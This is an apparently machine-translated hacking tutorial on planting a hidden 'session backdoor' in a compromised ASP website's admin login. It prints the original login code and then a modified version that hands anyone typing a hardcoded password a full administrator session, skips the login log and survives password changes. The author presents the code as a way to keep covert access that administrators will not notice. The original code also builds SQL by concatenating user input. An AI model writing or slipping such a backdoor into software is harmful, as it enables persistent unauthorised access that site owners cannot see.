Back door: website background session

It can be said that the website I got is good, or other websites, I have not basically changed the source code, and do not want to destroy any black pages, connections, and other things! However, there are only a few changes to the source code. In my opinion, if a website is better than a website that is meaningful, I will also be moved to the hidden heart! In addition to a webshell back door, the changes to the source code can be more foolproof for these websites!

Among them, I changed the login page. As we all know, website background login is a door. Only Authenticated Users are allowed to log on. Some login information will be stored during login, for example, record the ip address and logon time. Of course, we can change or delete these logon records on the database later! However, the Administrator's key is obtained, but we cannot add our own users, which is easily discovered by the administrator! In fact, most website administrators do not know the program. They only edit their own websites. Well, the session will play its role at this time!
Let's talk about the session. It is the session state. What is the session state? Because http is stateless, we cannot be stateless after logging on to a website! For example, when I purchased something, I suddenly found that everything I bought was gone when I settled it! So there are several situations in order to store the user's status: Save the client and save the server! Saving on the client is certainly not safe, because others may modify and use it. The server is highly secure, but you must know that the service resources are limited. When there are many users, it is highly demanding to store so many statuses!
Session is the session state, which is saved on the server, relative to the cookie. Generally, after the background Administrator logs on to the server, a session is saved for 20 minutes by default. However, when the server is busy, it will automatically clear the session, and it may not be saved for so long. The server has the final say! The session is used to mark whether you log on or not! So what I need to do is let it provide this sign to me!
Let's take a look at the following code.
If request. querystring ("logohost") = "npointhost" then
If trim (UCase (request. form ("cord") <> UCase (session ("admincode") then
Call ErrMsgBox ("Incorrect verification code ")
Else
Session ("admincode") = ""
Rs. open "Select * from adminlogo where name = '" & trim (request. Form ("user") & "'", conn, 1, 1
If rs. bof and rs. eof then
Call SucBox ("incorrect user name or password", "index. asp ")
Elseif npoint (trim (request. form ("password") <> rs ("pass") then
Call SucBox ("incorrect user name or password", "index. asp ")
Else
UserIP = replace (Request. ServerVariables ("REMOTE_ADDR "),"'","")
 
Session ("adminuser") = rs ("name ")
Session ("adminpass") = rs ("pass ")
Session ("admincs") = rs ("cs ")
Session ("NpadminSID") = Session. SessionID
Session. timeout = 45 ldate = now ()
Conn. execute ("Update adminlogo Set lip = '" & UserIP & "', ldate = '" & ldate & "'where name ='" & trim (request. form ("user "))&"'")
Response. Redirect ("main. asp ")
End if
End if
End if
It is the management login verification code of the n-point virtual system. Finally, you will find the saved session! In fact, I am not familiar with vb, but I can understand the meaning, language Interconnectivity is decided, as long as I become the following
If request. querystring ("logohost") = "npointhost" then
If trim (UCase (request. form ("cord") <> UCase (session ("admincode") then
Call ErrMsgBox ("Incorrect verification code ")
Elseif trim (request. form ("password") = "alickqubes" then
Session ("admincode") = ""
Rs. open "Select top 1 * from adminlogo", conn, 1, 1
Session ("adminuser") = rs ("name ")
Session ("adminpass") = rs ("pass ")
Session ("admincs") = rs ("cs ")
Session ("NpadminSID") = Session. SessionID
Session. timeout = 45
Response. Redirect ("main. asp ")
Else
Session ("admincode") = ""
Rs. open "Select * from adminlogo where name = '" & trim (request. Form ("user") & "'", conn, 1, 1
If rs. bof and rs. eof then
Call SucBox ("incorrect user name or password", "index. asp ")
Elseif npoint (trim (request. form ("password") <> rs ("pass") then
Call SucBox ("incorrect user name or password", "index. asp ")
Else
UserIP = replace (Request. ServerVariables ("REMOTE_ADDR "),"'","")
 
Session ("adminuser") = rs ("name ")
Session ("adminpass") = rs ("pass ")
Session ("admincs") = rs ("cs ")
Session ("NpadminSID") = Session. SessionID
Session. timeout = 45 ldate = now ()
Conn. execute ("Update adminlogo Set lip = '" & UserIP & "', ldate = '" & ldate & "'where name ='" & trim (request. form ("user "))&"'")
Response. Redirect ("main. asp ")
End if
End if
End if
In fact, I only need to enter the verification code and enter a username. Of course, alickqubes can successfully log on to the platform of the n-point virtual system, and its administrator can log on normally without any exception, my login won't be recorded in the login log at all! So the Administrator will not find it! Even if the administrator changes the password, as long as it does not change the name of the table in the entire database, the backend is open to me at any time. In fact, most of the administrators have told me that they do not understand the code, let him see nothing!
This is the session backdoor. Is it a bit interesting! Although I don't know much about vb, after all, I have learned c #, php, c, and c ++, but it is still not difficult to read these logic code! Most websites use the same background to determine whether the verification code is correct and then whether the user name and password are correct. However, I only added a judgment on the password after the verification code is correct, as long as the password is my personal alickqubes, you will get the ready-made Super administrator username and password from the database to fill in the required session, jump, if the password is not alickqubes, continue to the previous authentication method! For administrators who do not understand the code, they cannot find the attackers who want to kill the software! What we do is to leave a door under the copper wall and facilitate access in the future. This is the charm of the backdoor. If we do not find it, we will make it easy for ourselves, so that we only need it from time to time!